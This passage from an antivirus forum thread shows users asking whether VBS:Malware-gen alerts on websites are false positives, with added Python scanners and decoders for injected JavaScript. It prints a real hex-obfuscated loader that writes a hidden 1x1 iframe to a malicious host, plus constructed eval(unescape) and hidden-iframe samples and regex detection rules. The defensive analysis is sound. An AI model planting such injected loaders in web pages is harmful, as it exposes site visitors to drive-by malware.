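_uacct = "UA-0000000-0";  /* placeholder account id */
urchinTracker();
</script>
</body></html>"""

INJECTED_TAIL = (
    '<script language="javascript">$="%64b%3d%22%3c7`7%3c7a7%3c7b7'
    + "%3c7c7" * 40                      # constructed padding, not a real payload
    + '";eval(unescape($));</script>\n'
)
INJECTED_PAGE = BENIGN_PAGE.replace("</body>", INJECTED_TAIL + "</body>")

XOR_LOOP_PAGE = """<html><body><script type="text/javascript">
for(i=0;i<s.length;i++){o+=String.fromCharCode(s.charCodeAt(i)^k);}document.write(o);
</script></body></html>"""

HIDDEN_IFRAME_PAGE = ('<html><body><div style="visibility:hidden">'
                      '<iframe src="http://example.invalid/" width=1 height=1></iframe>'
                      '</div></body></html>')

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
PCT_RE = re.compile(r"%[0-9a-f]{2}", re.I)
ANALYTICS_RE = re.compile(r"urchinTracker\s*\(\s*\)|google-analytics\.com", re.I)
IFRAME_RE = re.compile(
    r"""<iframe[^>]*(?:\b(?:width|height)\s*=\s*["']?[01]\b"""
    r"""|visibility\s*:\s*hidden|display\s*:\s*none)""", re.I)

# Rules applied to the text of each <script> block.
SCRIPT_RULES = [
    ("eval-unescape", re.compile(r"\beval\s*\(\s*unescape\s*\(", re.I)),
    ("xor-decoder", re.compile(r"fromCharCode[\s\S]{0,80}charCodeAt[\s\S]{0,40}\^")),
]
PCT_THRESHOLD = 40   # this many %XX escapes in one block is unusual for hand-written JS


def scan_html(html: str) -> list:
    """Return a list of findings; each names the rules hit, the line number,
    and whether the block sits after the last Google Analytics reference."""
    ends = [m.end() for m in ANALYTICS_RE.finditer(html)]
    analytics_end = max(ends) if ends else None
    findings = []
    for m in SCRIPT_RE.finditer(html):
        body = m.group(1)
        hits = [name for name, rx in SCRIPT_RULES if rx.search(body)]
        if len(PCT_RE.findall(body)) >= PCT_THRESHOLD:
            hits.append("percent-heavy")
        if hits:
            findings.append(_finding(html, m.start(), hits, analytics_end, body))
    for m in IFRAME_RE.finditer(html):
        findings.append(_finding(html, m.start(), ["hidden-iframe"], analytics_end, m.group(0)))
    return findings


def _finding(html, offset, rules, analytics_end, text):
    return {
        "line": html.count("\n", 0, offset) + 1,
        "after_analytics": analytics_end is not None and offset > analytics_end,
        "rules": rules,
        "preview": text.strip()[:60],
    }


if __name__ == "__main__":
    for name, page in [("benign", BENIGN_PAGE), ("injected", INJECTED_PAGE),
                       ("xor-loop", XOR_LOOP_PAGE), ("iframe", HIDDEN_IFRAME_PAGE)]:
        print(name, scan_html(page))
```

The rules are deliberately coarse: legitimate minified libraries can trip `percent-heavy`, so treat a hit as "look at this block by hand", and read the `after_analytics` flag the way kubecj does in the thread, as a strong hint that the block was appended by someone other than the site's author.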
Title: Re: VBS:Malware-gen
Post by: xenio on September 11, 2008, 11:32:21 AM
I am getting a virus warning of: VBS:Malware-gen
in this web site: www.dinamobasket.com

but there is no encrypted javascript code in it.
any idea?
Thanks
Title: Re: VBS:Malware-gen
Post by: jsejtko on September 11, 2008, 11:42:55 AM
Hello,

detection of www.dinamobasket.com is a false positive and will be corrected in next vps update. Thanks for information.
Title: Re: VBS:Malware-gen
Post by: pedro1612 on September 27, 2008, 11:55:29 AM
I'm getting a virus warning of " VBS:Malware-gen"
in all websites of  *.freecoolsite.com

for example:

f.freecoolsite.com
prayudi.freecoolsite.com
homebased.freecoolsite.com
spidernet.freecoolsite.com

my version of VPS: 080926-0

Title: Re: VBS:Malware-gen
Post by: Lisandro on September 27, 2008, 02:52:32 PM
I'm getting a virus warning of " VBS:Malware-gen"
in all websites of  *.freecoolsite.com
Dr. Web returned clean. But I trust avast detection much more than it.
Maybe some obfuscated or encrypted script (malicious ???) could be in that pages.
Title: Re: VBS:Malware-gen
Post by: Casaboontha on September 27, 2008, 03:32:57 PM
site: http://www.casaboontha.com has the same report, and according to the hosting provider this is faulty.
VPS info from avast: 080926-0, 26-09-2008 build 4.8.1229
Title: Re: VBS:Malware-gen
Post by: DavidR on September 27, 2008, 04:33:58 PM
@ pedro1612
It certainly looks like an FP. I captured one page (Sign of "VBS:Malware-gen" has been found in "hXXp://f.freecoolsite.com/" file.) and uploaded it to virustotal, and effectively only avast detects anything.
See VT results http://www.virustotal.com/analisis/0ab73679254a792a8d003af65677aa3f (http://www.virustotal.com/analisis/0ab73679254a792a8d003af65677aa3f).

With the domain name followed by /" file. I don't know if avast is looking at one of the external links or the default page (which it seems to do or it wouldn't alert on the page I captured).

I didn't see anything obvious in the page that would trigger the alert.

I have sent a sample to avast for further analysis.
Title: Re: VBS:Malware-gen
Post by: Lisandro on September 27, 2008, 05:13:55 PM
It certainly looks like an FP
David, can you manage the code of that page and see if it is obfuscated or encrypted?
I really trust avast website detections... it's quite improved compared to other antivirus products.
Title: Re: VBS:Malware-gen
Post by: DavidR on September 27, 2008, 05:36:06 PM
It doesn't look like obfuscated or encrypted code; as I said, I can't see anything obvious (which given my limited experience isn't a certainty).
Title: Re: VBS:Malware-gen
Post by: pedro1612 on September 27, 2008, 05:37:07 PM
Thank you!!
Maybe it's something in the ads added automatically by a hosting provider... ?  ???
Title: Re: VBS:Malware-gen
Post by: DavidR on September 27, 2008, 05:50:55 PM
site: http://www.casaboontha.com has the same report, and according to the hosting provider this is faulty.
VPS info from avast: 080926-0, 26-09-2008 build 4.8.1229

I have had a look at this page and there are several batches of javascript that could be making avast alert as the code appears obfuscated and avast isn't alone in detecting something, see http://www.virustotal.com/analisis/cc711f2774933c9a422aaead3f11bc0b (http://www.virustotal.com/analisis/cc711f2774933c9a422aaead3f11bc0b).

Like this
Code:
<script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = '&#109;a' + 'i&#108;' + '&#116;o';
 var path = 'hr' + 'ef' + '=';
 var addy42235 = 's&#97;g&#97;f&#111;&#111;' + '&#64;';
 addy42235 = addy42235 + 'h&#111;tm&#97;&#105;l' + '&#46;' + 'c&#111;m';
 var addy_text42235 = 's&#97;g&#97;f&#111;&#111;' + '&#64;' + 'h&#111;tm&#97;&#105;l' + '&#46;' + 'c&#111;m';
 document.write( '<a ' + path + '\'' + prefix + ':' + addy42235 + '\'>' );
 document.write( addy_text42235 );
 document.write( '<\/a>' );
 //-->
 </script>

I haven't enough experience to know what is trying to be achieved but it isn't clear (javascript is a plain language) what is going on and this 'could' be the reason.

This one especially looks very suspicious, I have broken down the single line of code (as it would be huge) into something easier to read.
Code:
<script type="text/javascript">
// hex pair -> character code (parseInt(x, 16))
function BFD6F5DD5DB451E605DC93C1C(F856A149343E267113D4743C9CC){var BABAC8D053646DAAEED97=16;
return(parseInt(F856A149343E267113D4743C9CC,BABAC8D053646DAAEED97));}
// walks the hex string two characters at a time, decodes each pair
// and writes the result straight into the page with document.write
function EDC04E5FA7431499C99(AF1EAFAE6DA9EFFC64209858078EBFBC)
{function FDB6EFBD03C6DE29(){var A22AFFBCBE863863A1B64DF=2;return
A22AFFBCBE863863A1B64DF;}var A01766E6154626B4="";for(E846AAB0F24560E5FDD=0;
E846AAB0F24560E5FDD<AF1EAFAE6DA9EFFC64209858078EBFBC.length;
E846AAB0F24560E5FDD+=FDB6EFBD03C6DE29()){A01766E6154626B4+=
(String.fromCharCode(BFD6F5DD5DB451E605DC93C1C
(AF1EAFAE6DA9EFFC64209858078EBFBC.substr(E846AAB0F24560E5FDD,
FDB6EFBD03C6DE29()))));}document.write(A01766E6154626B4);}
// the single hex literal is split with + so the lines stay readable but still parse
EDC04E5FA7431499C99("3C696672616D65207372633D22687474703A2F2F7878786D6F7"+
"66965732E6469702E6A702F31352F6A735F676F5F66312E706870222077696474683D312"+
"06865696768743D31207374796C653D227669736962696C6974793A68696464656E3B70"+
"6F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
</script>
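The three encodings that keep coming up in this thread (the eval(unescape(...)) percent string from the unp*.tmp capture earlier, the &#NN; entity cloaking in the mailto snippet, and the hex-pair string fed to the parseInt/fromCharCode loop just above) can all be undone offline before deciding whether an alert is a false positive. The Python below is an added example, not code from this forum or from avast: the hex payload is the one posted above, the unescape sample and the cloaked prefix expression are constructed stand-ins (the original unescape payload was deleted from the post), and the hidden-iframe check (width/height of 0 or 1, or visibility:hidden / display:none) is my own heuristic.

```python
import html
import re
from urllib.parse import unquote, urlsplit

# Hex-pair string from the obfuscated script posted above (the page's own sample).
HEX_PAYLOAD = (
    "3C696672616D65207372633D22687474703A2F2F7878786D6F7"
    "66965732E6469702E6A702F31352F6A735F676F5F66312E706870222077696474683D312"
    "06865696768743D31207374796C653D227669736962696C6974793A68696464656E3B70"
    "6F736974696F6E3A6162736F6C757465223E3C2F696672616D653E"
)

# Constructed stand-in for the eval(unescape("%64%6F...%29%3B")) capture; the real
# payload was deleted from the post, this one decodes to a harmless call.
UNESCAPE_SAMPLE = "%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%68%69%27%29%3B"

# The 'prefix' expression from the entity-cloaked mailto snippet above.
ENTITY_SAMPLE = "'&#109;a' + 'i&#108;' + '&#116;o'"


def decode_hex_pairs(hexstr: str) -> str:
    """Undo the parseInt(substr(i, 2), 16) + String.fromCharCode loop."""
    return bytes.fromhex(hexstr).decode("latin-1")


def decode_js_unescape(encoded: str) -> str:
    """Behave like JavaScript's unescape(): %uXXXX then %XX, one code unit each."""
    s = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), encoded)
    return unquote(s, encoding="latin-1")


def decode_entity_concat(js_expr: str) -> str:
    """Join the literals of a JS 'a' + 'b' concatenation, then resolve &#NN; entities."""
    parts = re.findall(r"'([^']*)'|\"([^\"]*)\"", js_expr)
    return html.unescape("".join(sq or dq for sq, dq in parts))


IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""", re.I)


def find_hidden_iframes(markup: str) -> list:
    """List <iframe> elements a visitor could not see (heuristic, my own criteria)."""
    findings = []
    for m in IFRAME_RE.finditer(markup):
        attrs = {k.lower(): (dq or sq or bare)
                 for k, dq, sq, bare in ATTR_RE.findall(m.group(1))}
        style = attrs.get("style", "").replace(" ", "").lower()
        tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
        hidden = "visibility:hidden" in style or "display:none" in style
        if tiny or hidden:
            findings.append({
                "src_host": urlsplit(attrs.get("src", "")).hostname,
                "tiny": tiny,
                "hidden": hidden,
            })
    return findings


def triage_hex_script(hexstr: str) -> dict:
    """Decode a hex-pair payload and report what it would write into the page."""
    decoded = decode_hex_pairs(hexstr)
    return {"decoded": decoded, "hidden_iframes": find_hidden_iframes(decoded)}


if __name__ == "__main__":
    print(triage_hex_script(HEX_PAYLOAD))
    print(decode_js_unescape(UNESCAPE_SAMPLE))
    print(decode_entity_concat(ENTITY_SAMPLE))
```

Run against the posted payload, the hex string expands to a 1x1 iframe with visibility:hidden pointing at the xxxmovies.dip.jp host that kubecj names later in the thread, while the entity-cloaked expression resolves to a plain mailto prefix. That is the distinction worth drawing when judging an FP: obfuscation by itself is not the signal, what the decoded output does in the page is.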
Title: Re: VBS:Malware-gen
Post by: DavidR on September 27, 2008, 05:54:16 PM
Thank you!!
Maybe it's something in the ads added automatically by a hosting provider... ?  ???

You're welcome.

I have no idea if that might be the case, but there wasn't anything like that as far as I could tell. We will have to wait for avast to analyse it and correct the VPS if it is, as I suspect, an FP. They are usually quick to correct once identified.
Title: Re: VBS:Malware-gen
Post by: Lisandro on September 27, 2008, 08:26:07 PM
This one especially looks very suspicious
Thanks... I'm quite confident that something was cheesy...
Title: Re: VBS:Malware-gen
Post by: DavidR on September 27, 2008, 08:35:41 PM
It might be totally benign, but with that level of obfuscation you have to wonder why they need to do that.

Or if they are even aware of that last <script> after all of the HTML code, when by convention (W3C standards) all code, with the exception of document type information, should be between the opening and closing HTML tags. This script is outside those tags and that is also suspicious, and given the added obfuscation, more so.

So whoever was communicating with the webmaster should point that out too.
Title: Re: VBS:Malware-gen
Post by: pedro1612 on September 30, 2008, 02:57:45 AM
about freecoolsite... with new version the problem has ended ;D!
Title: Re: VBS:Malware-gen
Post by: DavidR on September 30, 2008, 02:44:41 PM
Thanks for the update.
Title: Re: VBS:Malware-gen
Post by: Casaboontha on October 04, 2008, 02:57:51 PM
site: http://www.casaboontha.com has the same report, and according to the hosting provider this is faulty.
VPS info from avast: 080926-0, 26-09-2008 build 4.8.1229

I have had a look at this page and there are several batches of javascript that could be making avast alert as the code appears obfuscated and avast isn't alone in detecting something, see http://www.virustotal.com/analisis/cc711f2774933c9a422aaead3f11bc0b (http://www.virustotal.com/analisis/cc711f2774933c9a422aaead3f11bc0b).

Like this
Code:
<script language='JavaScript' type='text/javascript'>
 <!--
 var prefix = '&#109;a' + 'i&#108;' + '&#116;o';
 var path = 'hr' + 'ef' + '=';
 var addy42235 = 's&#97;g&#97;f&#111;&#111;' + '&#64;';
 addy42235 = addy42235 + 'h&#111;tm&#97;&#105;l' + '&#46;' + 'c&#111;m';
 var addy_text42235 = 's&#97;g&#97;f&#111;&#111;' + '&#64;' + 'h&#111;tm&#97;&#105;l' + '&#46;' + 'c&#111;m';
 document.write( '<a ' + path + '\'' + prefix + ':' + addy42235 + '\'>' );
 document.write( addy_text42235 );
 document.write( '<\/a>' );
 //-->
 </script>

I haven't enough experience to know what is trying to be achieved but it isn't clear (javascript is a plain language) what is going on and this 'could' be the reason.

This one especially looks very suspicious, I have broken down the single line of code (as it would be huge) into something easier to read.
Code:
<script type="text/javascript">
// hex pair -> character code (parseInt(x, 16))
function BFD6F5DD5DB451E605DC93C1C(F856A149343E267113D4743C9CC){var BABAC8D053646DAAEED97=16;
return(parseInt(F856A149343E267113D4743C9CC,BABAC8D053646DAAEED97));}
// walks the hex string two characters at a time, decodes each pair
// and writes the result straight into the page with document.write
function EDC04E5FA7431499C99(AF1EAFAE6DA9EFFC64209858078EBFBC)
{function FDB6EFBD03C6DE29(){var A22AFFBCBE863863A1B64DF=2;return
A22AFFBCBE863863A1B64DF;}var A01766E6154626B4="";for(E846AAB0F24560E5FDD=0;
E846AAB0F24560E5FDD<AF1EAFAE6DA9EFFC64209858078EBFBC.length;
E846AAB0F24560E5FDD+=FDB6EFBD03C6DE29()){A01766E6154626B4+=
(String.fromCharCode(BFD6F5DD5DB451E605DC93C1C
(AF1EAFAE6DA9EFFC64209858078EBFBC.substr(E846AAB0F24560E5FDD,
FDB6EFBD03C6DE29()))));}document.write(A01766E6154626B4);}
// the single hex literal is split with + so the lines stay readable but still parse
EDC04E5FA7431499C99("3C696672616D65207372633D22687474703A2F2F7878786D6F7"+
"66965732E6469702E6A702F31352F6A735F676F5F66312E706870222077696474683D312"+
"06865696768743D31207374796C653D227669736962696C6974793A68696464656E3B70"+
"6F736974696F6E3A6162736F6C757465223E3C2F696672616D653E");
</script>

Many thanks, will have a look into the code.
Title: Re: VBS:Malware-gen
Post by: DavidR on October 04, 2008, 03:47:12 PM
You're welcome, happy hunting.

A belated welcome to the forums.
Title: Re: VBS:Malware-gen
Post by: mais on October 07, 2008, 11:02:14 AM
Hi,
  I have this warning with avast on one of my sites: sign of "VBS:Malware-gen" has been found in "http://www.ictraona.it", but I looked for every kind of malware code in the php and html files and there's nothing malicious. Can it be a fake warning?

my version

081006-0,06/10

Thanks.

Ciao
Title: Re: VBS:Malware-gen
Post by: kubecj on October 07, 2008, 11:26:13 AM
Encrypted hidden iframe at the beginning leading to xxxmovies.dip.jp...
Definitely does not look like a false.
Title: Re: VBS:Malware-gen
Post by: Lisandro on October 07, 2008, 02:10:28 PM
kubecj, are there legit uses of encrypted iframes or not? I mean, does avast detect any encrypted iframe or scans and separate the good from the bad ones?
Title: Re: VBS:Malware-gen
Post by: kubecj on October 07, 2008, 02:13:36 PM
I would never encrypt such a simple thing. But people are strange  ;D
Right now we don't detect all encrypted iframes as bad. But, that may change in the future.
Title: Re: VBS:Malware-gen
Post by: Lisandro on October 07, 2008, 02:15:55 PM
I would never encrypt such a simple thing. But people are strange  ;D
Right now we don't detect all encrypted iframes as bad. But, that may change in the future.
Thanks. Living and learning with you...
Title: Re: VBS:Malware-gen
Post by: DavidR on October 07, 2008, 04:18:26 PM
I take it that mais has been in and found that encrypted iframe and removed it as the link is no longer detected.
Title: Re: VBS:Malware-gen
Post by: Edward Gan on October 28, 2008, 10:04:00 AM
Hi Guys, I need help with this as I keep getting the alarm for the following.

File Name  : C:\autorun.inf
Malware Name : VBS:Malware-GEN
VPS Version : 081027-1, 10/27/2008

It starts the minute I turn the PC on and I cannot seem to get it off even though I tried scanning it in safe mode and all.

Please advise
Title: Re: VBS:Malware-gen
Post by: Lisandro on October 28, 2008, 12:08:39 PM
Are you using Windows XP/Vista?
Can you schedule a boot-time scanning?
Start avast! > Right click the skin > Schedule a boot-time scanning.
Select for scanning archives.
Boot.
If infected files are found, it's safer to send them to Chest instead of deleting them.
This way you can further analyse them.
Title: Re: VBS:Malware-gen
Post by: DavidR on October 28, 2008, 01:59:48 PM
There shouldn't be an autorun.inf on any hard disk partition; it is a file usually associated with removable media like a CD, to start the CD running.

So with autorun.inf in a HDD partition, it indicates that your system has been infected, most likely from a USB flash drive. Do you have a USB flash drive?

The autorun.inf will contain run commands for files also on your system (and probably undetected), so I would ask you to open this file with notepad and copy and paste the contents of the file here. You will need to pause the standard shield to be able to open this with notepad, enable the standard shield after you have copied the contents and closed the autorun.inf file.

There is most likely a location for a file that it is trying to run, see if you can find this file and upload it to virustotal, see below, for scanning.

Check the offending/suspect file at: VirusTotal - Multi engine on-line virus scanner (http://www.virustotal.com/) and report the findings here. You can't do this with the file securely in the chest, you need to extract it to a temporary (not original) location first, see below.

Create a folder called Suspect in the C:\ drive, e.g. C:\Suspect. Now exclude that folder in the Standard Shield, Customize, Advanced, Add, type (or copy and paste) C:\Suspect\* That will stop the standard shield scanning any file you put in that folder. You should now be able to export any file in the chest to this folder and upload it to VirusTotal without avast alerting.

If it is detected by multiple scanners but not avast send the sample to avast...
Send the sample to virus@avast.com zipped and password protected with the password in email body, a link to this topic might help and undetected malware in the subject.

Or you can also add the file to the User Files (File, Add) section of the avast chest (if it isn't already there) where it can do no harm and send it from there (select the file, right click, email to Alwil Software). No need to zip and PW protect when the sample is sent from chest. A copy of the file/s will remain in the original location, so any further action you take can remove that.
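DavidR's steps above (open the autorun.inf in Notepad, find the program it points at, check that file at VirusTotal) can be done against the pasted contents without running anything from the drive. The Python below is an added example, not the forum's or avast's code; the autorun.inf it parses is constructed with placeholder file names, and the drive root is an assumption you pass in.

```python
import ntpath

# Constructed autorun.inf with placeholder file names; the ones seen on infected
# drives use other names and are usually hidden/system files, so look for them
# with hidden files visible.
AUTORUN_SAMPLE = r"""[autorun]
open=launcher_PLACEHOLDER.exe
shellexecute=launcher_PLACEHOLDER.exe
shell\open\command=subdir\second_PLACEHOLDER.exe /s
icon=launcher_PLACEHOLDER.exe
action=Open folder to view files
label=My Disk
"""

LAUNCH_KEYS = ("open", "shellexecute")


def parse_autorun(text: str) -> dict:
    """Return the key=value pairs of the [autorun] section, keys lower-cased."""
    entries = {}
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "autorun" and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def is_launch_key(key: str) -> bool:
    """open=, shellexecute= and shell\\<verb>\\command= all name a program to run."""
    return key in LAUNCH_KEYS or (key.startswith("shell\\") and key.endswith("\\command"))


def referenced_programs(text: str, drive_root: str = "D:\\") -> list:
    """Absolute paths of every program the autorun.inf would start from drive_root."""
    programs = set()
    for key, value in parse_autorun(text).items():
        if not is_launch_key(key) or not value:
            continue
        exe = value.split()[0].strip('"')  # drop command-line arguments
        programs.add(exe if ntpath.isabs(exe) else ntpath.join(drive_root, exe))
    return sorted(programs)


if __name__ == "__main__":
    for program in referenced_programs(AUTORUN_SAMPLE, "D:\\"):
        print(program)
```

The paths it prints are the files to copy into the excluded C:\Suspect folder and upload to VirusTotal; the action= and label= lines are only there to make the drive look ordinary in Explorer and do not run anything.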
Title: Re: VBS:Malware-gen
Post by: 7thachmad on October 29, 2008, 03:47:06 AM
I've got problems with irritating malware and a trojan called win32:Pink [trj] and vbs:malware-gen. avast Home Edition won't work, not even the splash screen scanner, but the service is still running; it looks like if there is an open window whose text contains "antivirus" the trojan quickly disables it.

I've used the boot time scan and turned off system restore; it successfully deleted Autorun.inf on the c:\ and d:\ drives and I was forced to delete netcfg.dll and netcfg.0000 in the system32\com folder, which are recognised as win32:Pink [trj], but it keeps coming back when the system starts again.

please help  :'(

I use Windows XP Service Pack 2 build 2600; VPS I forgot.
Title: Re: VBS:Malware-gen
Post by: redsock2 on November 03, 2008, 06:56:06 AM
Hello,

I have a VBS:Malware-gen

when I access
http://www.equilibriarte.org

VPS-Version: 081102-0, 11/02/2008

I think they use Iframes - Is there really a Problem with this site??
Please take a look...
Thanks for your help !!!
Title: Re: VBS:Malware-gen
Post by: kubecj on November 03, 2008, 07:57:56 AM
Yep, they're serving something long, strange and encrypted at the end of the html.
Title: Re: VBS:Malware-gen
Post by: Lisandro on November 03, 2008, 02:10:00 PM
redsock2, nowadays avast website detection is more accurate and higher than that of other antiviruses. Welcome to avast forums.
Title: Re: VBS:Malware-gen
Post by: redsock2 on November 03, 2008, 02:15:10 PM
Yes, I am impressed, really!!!
Thank you...
I will recommend Avast now :-))

I ask myself why the equilibri admins don't notice this
script and remove it; it's obvious in the HTML source..
Also, it only appears on their main page, strange..
Title: Re: VBS:Malware-gen
Post by: DavidR on November 03, 2008, 03:18:29 PM
Yes, strange indeed. If it is something they know about then you would have to ask why the hidden, encrypted data in javascript, which is a plain-language script; what have they to hide? Either that or they are unaware that their home page has been hacked.

Welcome to the forums.
Title: Re: VBS:Malware-gen
Post by: dalonzolaw on December 17, 2008, 03:32:38 PM
Hello,

I have a VBS:Malware-gen

when I access hxxp://www.asdaurora-pregnana.it

VPS Version :  081217-0

can anybody help me ?

thanks

iussi
Title: Re: VBS:Malware-gen
Post by: kubecj on December 17, 2008, 03:54:37 PM
There is an encrypted javascript at the end of the page, almost certainly malware; I'd not consider that an FP.
Title: Re: VBS:Malware-gen
Post by: buyog on December 17, 2008, 07:58:35 PM
I have the same problem

Avast popups when going to the site
hXXp://kentvoice.com

Screenshot here:
http://root.joshmir.com/vbs-malware.png

Thanks
Title: Re: VBS:Malware-gen
Post by: Lisandro on December 17, 2008, 08:00:52 PM
buyog, nowadays, avast malware detection on webpages is quite accurate... take care!
Title: Re: VBS:Malware-gen
Post by: kubecj on December 17, 2008, 08:17:04 PM
Large, encrypted stuff at the end of the page, most likely the malware.

Remember:
a) you can catch the bad stuff even from legitimate pages
b) Using MSIE can get you in trouble, avoid it if possible.
Title: Re: VBS:Malware-gen
Post by: Casaboontha on January 01, 2009, 10:44:49 PM
a belated thank you to DavidR for pointing out the code!
I was able to fix my website. Thanks and a happy and prosperous 2009!
Title: Re: VBS:Malware-gen
Post by: DavidR on January 01, 2009, 11:03:56 PM
You're welcome and a Happy New Year to you too.
Title: Re: VBS:Malware-gen
Post by: barmon on January 03, 2009, 01:16:34 AM
Hi

I have avast home and every time I go to this site:  http://www.clownclicks.com avast pops up for me to abort connection.

It says Malware name: VBS:Obfuscated-gen [trj]

Malware type:  Trojan Horse

VPS version:  090102-0, 01/02/2009

This does not appear in any other sites I go to, just to clownclicks.com
Never had any problems going to clownclicks.com and this virus warning just started about 30 min ago

I asked 3 friends to pull up clownclicks.com and they tell me they do not get any virus warnings.
So why me????

Hope to get answers, thanks!
Title: Re: VBS:Malware-gen
Post by: polonus on January 03, 2009, 01:22:51 AM
Hi, I scanned it with DrWeb's link checker:
Checking: http://www.clownclicks.com/
Engine version: 4.44.0.9170
File size: 10.84 KB

http://www.clownclicks.com/ - Ok

Checking: http://www.clownclicks.com/functions.js
File size: 7390 bytes

Went there with flock browser and NoScript temporarily allowing that site, no alerts (not from avast). So there must be something else wrong. Is your java version up to date?

polonus

Title: Re: VBS:Malware-gen
Post by: kubecj on January 03, 2009, 01:24:21 AM
Does not alarm for me either. Could it be you got something bad installed on your computer? Please start another thread if you want to get more help.
Title: Re: VBS:Malware-gen
Post by: DavidR on January 03, 2009, 01:29:40 AM
I can visit that page without an alert, and I can't see anything in the page source that might trigger it; perhaps the webmaster found the script and removed it. Or, as kubecj said, perhaps something on your system.
 
Title: Re: VBS:Malware-gen
Post by: foto on January 07, 2009, 10:43:50 AM
 Same here hxxp://www.live-magazine.eu/
 Can you check it, please. Thanks
Title: Re: VBS:Malware-gen
Post by: kubecj on January 07, 2009, 10:51:22 AM
Mega-obfuscated script at the end of the page. Not a fp.
Title: Re: VBS:Malware-gen
Post by: NLT on January 07, 2009, 09:23:50 PM
Hello,

I was looking at my "warning" log, and found the following from 6/23/2008:

"VBS Malware-gen has been found in "http://www.yahoo.com/\unp 113810025 file"

I never received any other notification of this problem, other than just noticing it in the log.  I have had no problems, whatsoever, so I am proceeding under the assumption there is nothing to be concerned about.  Am I correct?  Thank you for any replies and corrections.
Title: Re: VBS:Malware-gen
Post by: polonus on January 07, 2009, 10:20:26 PM
Hi foto,

The live-magazine dot eu link is also flagged by finjan as having malicious code,

polonus
Title: Re: VBS:Malware-gen
Post by: theefxman on January 10, 2009, 03:00:46 PM
I am also getting a VBS:Malware-gen message when visiting what I believe to be a safe company website.

hXXp://www.thelawrencegroup.com/

Filename hXXp://www.thelawrencegroup.com/AC_RunActiveContent.js
VBS:Malware-gen
Virus/Worm
090109-0, 01/09/2009

Please let me know if this is a false positive.
Title: Re: VBS:Malware-gen
Post by: DavidR on January 10, 2009, 03:29:39 PM
There is a big chunk of obfuscated document write (javascript) at the bottom of the script.

I have no idea what that is intended to do, why it would be obfuscated in that way, or even if it is meant to be there. Since javascript is meant to be a plain-language scripting language, when it is obfuscated in this way I get suspicious at what they have to hide.

So it may well be a legit detection but you could submit it (as a possible false positive) for further analysis.
Title: Re: VBS:Malware-gen
Post by: statikuz on February 21, 2009, 09:29:13 PM
I'm getting this same warning for hXXp://ssbresins.com/. It has the same line of compressed/weird JS as some of these other pages. Just thought I'd chime in.
Title: Re: VBS:Malware-gen
Post by: DavidR on February 21, 2009, 09:43:26 PM
Well if it is your site or one you regularly visit it has probably been hacked.

Considering its location just before the closing Body and HTML tags it certainly looks like code injection into the page.

Please modify your post, changing the http to hXXp so the link isn't active, avoiding accidental exposure, e.g. hXXp://ssbresins.com/.
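Two of DavidR's observations in this thread, the script that sat outside the closing HTML tags on the casaboontha page and the chunk injected just before the closing Body and HTML tags here, are position checks that can be automated over saved page source. The Python below is an added example, not code from the forum or from avast: it lists every script block that is misplaced relative to </body> and </html> or that carries one of the obfuscation markers seen in this thread (eval(unescape(...)), long percent-encoded or hex literals, String.fromCharCode with parseInt(..., 16), document.write). The sample page is constructed, and the marker regexes and thresholds are my own heuristics, not avast's.

```python
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

# Obfuscation markers that recur in this thread; each is a loose regex, not a signature.
INDICATORS = {
    "eval_unescape": re.compile(r"eval\s*\(\s*unescape\s*\(", re.I),
    "percent_encoded": re.compile(r"""["'](?:%[0-9A-Fa-f]{2}){8,}["']"""),
    "string_fromcharcode": re.compile(r"String\.fromCharCode\s*\("),
    "parseint_radix16": re.compile(r"parseInt\s*\(.*?,\s*16\s*\)", re.S),
    "long_hex_literal": re.compile(r"""["'][0-9A-Fa-f]{40,}["']"""),
    "document_write": re.compile(r"document\.write\s*\("),
}

# Constructed page: a benign inline script in <head>, a hex-decoding writer as the
# last element before </body>, and a script tacked on after </html>.
SAMPLE_PAGE = """<html><head><title>constructed sample</title>
<script type="text/javascript">var counter = 1;</script>
</head>
<body><p>Hello</p>
<script type="text/javascript">
function h2c(s){var o="";for(var i=0;i<s.length;i+=2){o+=String.fromCharCode(parseInt(s.substr(i,2),16));}document.write(o);}
h2c("3C703E636F6E7374727563746564206578616D706C653C2F703E");
</script>
</body></html>
<script type="text/javascript">eval(unescape("%64%6F%63%75%6D%65%6E%74%2E%74%69%74%6C%65%3B"));</script>
"""


def script_position(page: str, offset: int) -> str:
    """Where a script tag sits relative to the closing </body> and </html> tags."""
    lower = page.lower()
    html_end = lower.rfind("</html>")
    body_end = lower.rfind("</body>")
    if html_end != -1 and offset > html_end:
        return "after </html>"
    if body_end != -1 and offset > body_end:
        return "after </body>"
    return "inside document"


def audit_scripts(page: str) -> list:
    """Report scripts that are misplaced or carry obfuscation markers."""
    body_end = page.lower().rfind("</body>")
    findings = []
    for m in SCRIPT_RE.finditer(page):
        hits = [name for name, rx in INDICATORS.items() if rx.search(m.group(1))]
        position = script_position(page, m.start())
        # Injected code is often the very last thing before </body>.
        last_before_body = body_end > m.end() and page[m.end():body_end].strip() == ""
        if hits or position != "inside document":
            findings.append({
                "offset": m.start(),
                "position": position,
                "last_before_body_close": last_before_body,
                "indicators": hits,
            })
    return findings


if __name__ == "__main__":
    for finding in audit_scripts(SAMPLE_PAGE):
        print(finding)
```

On the constructed page the head script is silent, the hex writer is reported as the last element before </body> with four markers, and the trailing eval(unescape(...)) is reported as sitting after </html>. A benign page can still trip a marker (mailto cloaking uses document.write), so the output is a list of places to read, not a verdict.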
Title: Re: VBS:Malware-gen
Post by: REDACTED on March 02, 2009, 08:21:07 PM
Getting Malware-gen for hXXp://icamaxi.se, any idea if it's a FP?

Thanks
Title: Re: VBS:Malware-gen
Post by: kubecj on March 02, 2009, 08:25:58 PM
Not a false.
Title: Re: VBS:Malware-gen
